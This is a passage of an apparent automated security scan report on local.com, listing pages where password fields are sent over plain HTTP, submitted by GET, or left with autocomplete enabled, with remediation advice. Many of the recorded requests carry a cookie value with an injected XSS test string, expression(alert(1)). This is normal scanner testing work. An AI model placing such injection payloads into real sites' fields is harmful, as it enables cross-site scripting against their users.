Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.29. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/sitemap/new-york-ny.aspx

The form contains the following password field:

password

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.30. http://www.local.com/terms/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/terms/

The form contains the following password field:

password

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.31. http://www.local.com/topics/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/topics/?topic=food&keyword=food

The form contains the following password field:

password

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

4. Password field submitted using GET method previous next
There are 30 instances of this issue:

/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/contact.aspx
/coupons/
/coupons/printable/
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

4.1. http://www.local.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

4.2. http://www.local.com/business/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/

The form contains the following password field:

password

Request

Response

4.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

The form contains the following password field:

password

Request

Response

4.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field:

password

Request

Response

4.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

The form contains the following password field:

password

Request

Response

4.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field:

password

Request

Response

4.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

The form contains the following password field:

password

Request

Response

4.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

The form contains the following password field:

password

Request

Response

4.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field:

password

Request

Response

4.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

The form contains the following password field:

password

Request

Response

4.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field:

password

Request

Response

4.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

The form contains the following password field:

password

Request

Response

4.13. http://www.local.com/business/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/business/results/

The form contains the following password field:

password

Request

Response

4.14. http://www.local.com/contact.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/contact.aspx

The form contains the following password field:

password

Request

Response

4.15. http://www.local.com/coupons/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/coupons/

The form contains the following password field:

password

Request

Response

4.16. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/coupons/printable/

The form contains the following password field:

password

Request

Response

4.17. http://www.local.com/events/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/events/

The form contains the following password field:

password

Request

Response

4.18. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/events/category/music/dallas-tx.aspx

The form contains the following password field:

password

Request

Response

4.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/events/category/performing-arts/dallas-tx.aspx

The form contains the following password field:

password

Request

Response

4.20. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/events/category/sports/dallas-tx.aspx

The form contains the following password field:

password

Request

Response

4.21. http://www.local.com/faq.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/faq.aspx

The form contains the following password field:

password

Request

Response

4.22. http://www.local.com/privacy/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/privacy/

The form contains the following password field:

password

Request

Response

4.23. http://www.local.com/results.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/results.aspx

The form contains the following password field:

password

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.24. http://www.local.com/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/results/

The form contains the following password field:

password

Request

Response

4.25. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/sitemap.aspx

The form contains the following password field:

password

Request

Response

4.26. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/sitemap/chicago-il.aspx

The form contains the following password field:

password

Request

Response

4.27. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/sitemap/los-angeles-ca.aspx

The form contains the following password field:

password

Request

Response

4.28. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/sitemap/new-york-ny.aspx

The form contains the following password field:

password

Request

Response

4.29. http://www.local.com/terms/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/terms/

The form contains the following password field:

password

Request

Response

4.30. http://www.local.com/topics/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.local.com/topics/?topic=food&keyword=food

The form contains the following password field:

password

Request

Response

5. Password field with autocomplete enabled previous next
There are 38 instances of this issue:

/
/business/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/business/results/
/contact.aspx
/coupons/
/coupons/
/coupons/printable/
/dialogs/register.aspx
/events/
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results.aspx
/results/
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/
/topics/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

5.1. http://www.local.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.2. http://www.local.com/business/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.3. http://www.local.com/business/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/?location=Dallas%2c+TX

The form contains the following password field with autocomplete enabled:

password

Request

GET /business/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.4. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.5. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.6. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.7. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.8. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.9. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.10. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.11. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.12. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.13. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

